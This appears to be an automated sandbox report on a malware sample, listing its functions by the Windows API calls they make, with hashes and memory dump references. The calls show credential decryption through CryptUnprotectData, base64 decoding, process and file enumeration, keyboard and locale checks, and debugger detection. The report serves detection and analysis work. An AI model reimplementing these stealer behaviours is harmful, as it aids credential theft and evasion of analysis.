API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5

Function 0081CA87 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0081CABA
lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0081CAD8
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0081CAE3
memcpy.MSVCRT(?,?,?), ref: 0081CB79
lstrcat.KERNEL32(?,00420B46), ref: 0081CBAA
lstrcat.KERNEL32(?,00420B47), ref: 0081CBBE
lstrcat.KERNEL32(?,00420B4E), ref: 0081CBDF

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
Instruction ID: 1825b39ccc3f4b57cfb7175d0cc2150854e761d127a1e3d5959995f2d88bd720
Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
Instruction Fuzzy Hash: 0A415E7894421AEFDB10DFD4DC89BEEBBB8FF44704F1045A8E509A6280D7745A84CF95

Function 0040C820 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C853
lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00899AF0), ref: 0040C871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
memcpy.MSVCRT(?,?,?), ref: 0040C912
lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95

Function 00416920 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,00899BA0,?,0042110C,?,00000000,?), ref: 0041696C
sscanf.NTDLL ref: 00416999
SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,00899BA0,?,0042110C), ref: 004169B2
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00899BA0,?,0042110C), ref: 004169C0
ExitProcess.KERNEL32 ref: 004169DA

Strings

B, xrefs: 004169C9

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID: B
API String ID: 2533653975-2248957098
Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69

Function 00409AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F

Strings

N@, xrefs: 00409AD4, 00409AE1, 00409AF9, 00409B18, 00409AE4, 00409B1B

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: N@
API String ID: 4291131564-4229412743
Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54

Function 00827DF7 Relevance: 7.6, APIs: 5, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00827E48
LocalAlloc.KERNEL32(00000040,?), ref: 00827E60
GetKeyboardLayoutList.USER32(?,00000000), ref: 00827E74
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00827EC9
LocalFree.KERNEL32(00000000), ref: 00827F89

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID:
API String ID: 3090951853-0
Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
Instruction ID: 714e1f6ee7bdd6cc2612d103b2a366001a8587fcb931d2ca394d30172f8cc828
Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
Instruction Fuzzy Hash: D3412A71945228ABDB24DB94ED89BEDB3B8FF44704F204199E00AA2191DB342FC5CF92

Function 0082B5A1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0082BE09
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0082BE1E
UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0082BE29
GetCurrentProcess.KERNEL32(C0000409), ref: 0082BE45
TerminateProcess.KERNEL32(00000000), ref: 0082BE4C

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
Instruction ID: 26d6543f775a692d52bfd90dc18062cb4cb91729140cc1a301dfe6fee66abe54
Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
Instruction Fuzzy Hash: A021C0BC9012159FDB10DF29F9896963BF4FB0A314F10403AE90A872A4EBB05981EF49

Function 0041B33A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041BBA2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
TerminateProcess.KERNEL32(00000000), ref: 0041BBE5

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D

Function 008174A7 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 008174B4
RtlAllocateHeap.NTDLL(00000000), ref: 008174BB
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008174E8
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 0081750B
LocalFree.KERNEL32(?), ref: 00817515

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
Instruction ID: 1048edc18589a4229b9e82c7a0e53a4093d6fb11eac649e0cfad006c6008aa65
Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
Instruction Fuzzy Hash: C4010075A84208BBEB10DFD4DD45F9D77B9EB44704F104159F705AA2C0D670AA008B65

Function 00407240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66

Function 00829867 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00829885
Process32First.KERNEL32(00420ACA,00000128), ref: 00829899
Process32Next.KERNEL32(00420ACA,00000128), ref: 008298AE
StrCmpCA.SHLWAPI(?,00000000), ref: 008298C3
CloseHandle.KERNEL32(00420ACA), ref: 008298E1

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
Instruction ID: 7646754e423df8fb580bc04431266cc9fbdb3b3a711ffddad55da16669515ef3
Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
Instruction Fuzzy Hash: 38012979A40218FBCB20DFA4D854BEDB7F9FB0A300F044199E545E6240D7749A80CF51

Function 00419600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
CloseHandle.KERNEL32(00420ACA), ref: 0041967A

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61

Function 0081E697 Relevance: 6.5, APIs: 4, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 0081E709
StrCmpCA.SHLWAPI(?,004214F8), ref: 0081E759
StrCmpCA.SHLWAPI(?,004214FC), ref: 0081E76F
FindNextFileA.KERNEL32(000000FF,?), ref: 0081EE46

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID:
API String ID: 433455689-0
Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
Instruction ID: 39c100c3f4b0c15f3b494c7f4efee960258e086ced9d6d7e304a1d0775f5303d
Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
Instruction Fuzzy Hash: 0512B871A102289BCB1CFB68ED96EED7379FF54700F4041A9B50AA6491EE345BC8CE53

Function 00829107 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,008153EB,40000001,00000000,00000000,?,008153EB), ref: 00829127

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
Instruction ID: b10a8ebb8eaa8a585cdc0f2e69fbe17914cdf703ea203ded1091a533ac3b4e66
Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
Instruction Fuzzy Hash: 2911DA74204209BFDB00CF95E889FA633AAFF89754F109558F949CB250D779E892DB60

Function 00418EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65

Function 00819D27 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00815155,00000000,00000000), ref: 00819D56
LocalAlloc.KERNEL32(00000040,?,?,?,00815155,00000000,?), ref: 00819D68
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00815155,00000000,00000000), ref: 00819D91
LocalFree.KERNEL32(?,?,?,?,00815155,00000000,?), ref: 00819DA6

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
Instruction ID: 916a129e6b92d99284fb4a9052e317fa04528ece5bff8eece0e374618ab8571e
Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
Instruction Fuzzy Hash: 5611A4B4240208BFEB10CFA4DC95FAA77B9FB89704F208058FD159B390C776A941CB90

Function 00819DC7 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00819DEB
LocalAlloc.KERNEL32(00000040,00000000), ref: 00819E0A
memcpy.MSVCRT(?,?,?), ref: 00819E2D
LocalFree.KERNEL32(?), ref: 00819E3A

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
Instruction ID: 54e531264da74ed8eda34d2d059c8b8374d9a828be2d85caf845aaae8b8e0934
Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
Instruction Fuzzy Hash: 7E11F7B8A00209EFDB04CFA8D985AEEB7B9FF89300F104558E915A7350D770AE50CFA1

Function 00409B60 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
memcpy.MSVCRT(?,?,?), ref: 00409BC6
LocalFree.KERNEL32(?), ref: 00409BD3

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61

Function 00417A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,008C92F8,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,008C92F8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,008C92F8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
wsprintfA.USER32 ref: 00417AB7

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55

Function 00413720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

